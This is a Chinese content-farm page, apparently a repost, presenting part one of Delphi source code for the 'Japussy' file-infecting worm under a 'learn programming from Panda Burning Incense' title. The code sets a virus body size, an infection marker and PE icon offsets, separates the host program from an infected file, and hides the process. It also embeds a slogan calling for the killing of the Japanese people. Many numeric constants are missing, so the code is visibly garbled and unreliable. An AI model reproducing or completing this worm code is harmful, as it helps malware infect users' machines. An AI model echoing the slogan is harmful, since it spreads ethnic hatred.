知识大全 从“熊猫烧香”中学程序[1]

Posted 文件

篇首语:聪明在于勤奋,天才在于积累。本文由小常识网(cha138.com)小编为大家整理,主要介绍了知识大全 从“熊猫烧香”中学程序[1]相关的知识,希望对你有一定的参考价值。

  本文来自互联网 仅供学习和研究使用 后果自行负责 造成的任何损失与本站无关 特此声明   program Japussy;  uses    Windows SysUtils Classes Graphics ShellAPI Registry;  const    HeaderSize = ;                  //病毒体的大小    IconOffset = $ EB ;                //PE文件主图标的偏移量      //在我的Delphi SP 上面编译得到的大小 其它版本的Delphi可能不同    //查找 的十六进制字符串可以找到主图标的偏移量        HeaderSize = ;                  //Upx压缩过病毒体的大小    IconOffset = $ BC;                  //Upx压缩过PE文件主图标的偏移量      //Upx W 用法: upx Japussy exe      IconSize  = $ E ;                  //PE文件主图标的大小 字节    IconTail  = IconOffset + IconSize;  //PE文件主图标的尾部    ID        = $ ;              //感染标记      //垃圾码 以备写入    Catchword = If a race need to be killed out it must be Yamato +                If a country need to be destroyed it must be Japan! +                *** W Japussy Worm A *** ;  $R * RES  function RegisterServiceProcess(dwProcessID dwType: Integer): Integer;     stdcall; external Kernel dll ; //函数声明  var    TmpFile: string;    Si:      STARTUPINFO;    Pi:      PROCESS_INFORMATION;    IsJap:  Boolean = False; //日文操作系统标记   判断是否为Win x   function IsWin x: Boolean;  var    Ver: TOSVersionInfo;  begin    Result := False;    Ver dwOSVersionInfoSize := SizeOf(TOSVersionInfo);   if not GetVersionEx(Ver) then    Exit;  if (Ver dwPlatformID = VER_PLATFORM_WIN _WINDOWS) then //Win x    Result := True;  end;   在流之间复制   procedure CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream;    dStartPos: Integer; Count: Integer);  var    sCurPos dCurPos: Integer;  begin    sCurPos := Src Position;    dCurPos := Dst Position;    Src Seek(sStartPos );    Dst Seek(dStartPos );    Dst CopyFrom(Src Count);    Src Seek(sCurPos );    Dst Seek(dCurPos );  end;   将宿主文件从已感染的PE文件中分离出来 以备使用   procedure ExtractFile(FileName: string);  var    sStream dStream: TFileStream;  begin    try      sStream := TFileStream Create(ParamStr( ) fmOpenRead or   fmShareDenyNone);      try        dStream := TFileStream Create(FileName fmCreate);        try          sStream Seek(HeaderSize ); //跳过头部的病毒部分          dStream CopyFrom(sStream sStream Size HeaderSize);        finally          dStream Free;          end;      finally        sStream Free;      end;    except    end;  end;   填充STARTUPINFO结构

cha138/Article/program/Delphi/201311/8473

相关参考

知识大全 从“熊猫烧香”中学程序[2]

    procedureFillStartupInfo(varSi:STARTUPINFO;State:Word);  begin   Sicb:=

知识大全 从“熊猫烧香”中学程序[5]

    procedureInfectFiles;  var   DriverList:string;   iLen:Integer;  b

知识大全 从“熊猫烧香”中学程序[4]

    end;  begin   if(FindFirst(Path+MaskfaAnyFileSearchRec)=)then   be

知识大全 Delphi版模仿熊猫烧香病毒核心源码

Delphi版模仿熊猫烧香病毒核心源码  以下文字资料是由(全榜网网www.cha138.com)小编为大家搜集整理后发布的内容,让我们赶快一起来看一下吧!WordWRA

知识大全 从广州人和出口坐哪路公交车到花都青布中学

从广州人和出口坐哪路公交车到花都青布中学公交线路:715路,全程约7.7公里1、从人和出口(广州机场...步行约1.0公里,到达凤和庄站2、乘坐715路,经过6站,到达清布中学站(也可乘坐701路、花

知识大全 怎样才能使高中生从游戏中学会学习

怎样才能使高中生从游戏中学会学习首先还是要有正确的引导。。。明确你玩游戏的目的是什么找到你玩游戏的目的你自然可以规划你的时间找到学习和游戏的平衡高中生的话在游戏中可以多结交一些年龄比较大的玩家他们会分

恩格斯说“伟大的阶级,正如伟大的民族一样,无论从哪方面学习都不如从__中学习来得快。”

恩格斯说“伟大的阶级,正如伟大的民族一样,无论从哪方面学习都不如从_____中学习来得快。”A、自己所犯错误B、自己所取得的成绩C、自己所犯错误的后果D、自己所取得成绩的后果答案:C解析:恩格斯在《英

知识大全 从Reifer的“敏捷方法定量分析”研究中学到的十个知识点

从Reifer的“敏捷方法定量分析”研究中学到的十个知识点  以下文字资料是由(全榜网网www.cha138.com)小编为大家搜集整理后发布的内容,让我们赶快一起来看一

某中学历史探究课上,学生从“穿衣”的角度表达了他们对诸子百家思想的理解。甲生说:穿衣服应合乎大自然四季的变化来穿衣,天气

某中学历史探究课上,学生从“穿衣”的角度表达了他们对诸子百家思想的理解。甲生说:穿衣服应合乎大自然四季的变化来穿衣,天气冷多穿一点,天气热少穿一点;乙生说:穿衣服要看你的身份地位,什么身份、何种地位,

知识大全 初三中学生如何快速学好英语

初三中学生如何快速学好英语?进步的空间很大~想要达到91分也不是不可能!相信自己,从现在开始,每天背中考必考的词语,把初中三年的英语书里面的课文都读准读顺,迅速提升预感。不知道你有没有学过音标,如果没